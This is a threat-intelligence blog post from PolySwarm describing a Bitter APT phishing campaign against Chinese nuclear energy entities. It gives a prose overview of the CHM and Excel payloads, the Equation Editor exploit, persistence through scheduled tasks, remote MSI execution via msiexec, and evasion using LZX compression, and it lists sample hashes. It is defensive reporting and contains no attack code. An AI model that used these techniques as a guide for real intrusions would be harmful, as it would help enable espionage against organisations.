The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Bitter APT Campaign Targets Energy Sector

Apr 10, 2023 1:22:19 PM / by The Hivemind

bitterAPT Verticals Targeted: Energy

Executive Summary

A recent Bitter APT campaign targeted nuclear energy entities in China. The threat actors used multiple techniques to obtain access to the victim machine, maintain persistence, and download and execute next-stage payloads.

Key Takeaways

  • Bitter APT recently launched an espionage campaign targeting energy sector entities in China.
  • The threat actors used a phishing lure masquerading as a conference invitation from an embassy attache.
  • The threat actors used both CHM and Excel payloads and employed multiple techniques in an attempt to evade detection and analysis. 

The Campaign

Intezer recently reported on a Bitter APT campaign targeting nuclear energy entities in China. The threat actors engaged targets with a phishing campaign, with lures pretending to be from the Embassy of Kyrgyzstan in Beijing, inviting the recipient to join a conference related to their field. The emails have an attached RAR file containing a CHM or Excel payload. The email is meant to entice the intended victim into opening the RAR file. To add a sense of legitimacy to the email, the threat actors used the name of an actual attache at the embassy.

In the campaign, the threat actors used multiple malicious payloads, which were compressed into RAR files. The payloads are intended to maintain persistence in the victim network and download additional malware payloads.

The Excel payloads use an Equation Editor exploit to create two scheduled tasks: one used to download the next stage payload and another to attempt to execute the newly downloaded payload.

The CHM files, associated with Microsoft Compiled HTML Help, are used to execute arbitrary code and to create scheduled tasks. This allows the threat actor to obtain persistence on the victim machine, with very little user interaction required to initiate the infection. Additionally, the CHM files use LZX compression, allowing them to bypass static malware analysis if the file is not decompressed. One version of the CHM file creates a scheduled task that uses msiexec, a living-off-the-land binary (LoLBin), to execute a remote MSI payload hosted on the C2. Another version of the CHM payload performs similar activity using an encoded PowerShell command stage.

Who is Bitter APT?

Bitter APT is a threat actor group thought to operate out of South Asia. The group primarily engages in espionage campaigns. Bitter APT has previously targeted government and energy sector entities in Pakistan, China, Saudi Arabia, and Bangladesh.

IOCs

PolySwarm has multiple samples associated with this campaign.


Eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e

Cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179

8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74

33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799

5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc

Ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1

b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa


You can use the following CLI command to search for all Bitter APT samples in our portal:

$ polyswarm link list -f BitterAPT


Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports


Topics: Threat Bulletin, China, Energy, South Asia, Bitter APT, Nuclear

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts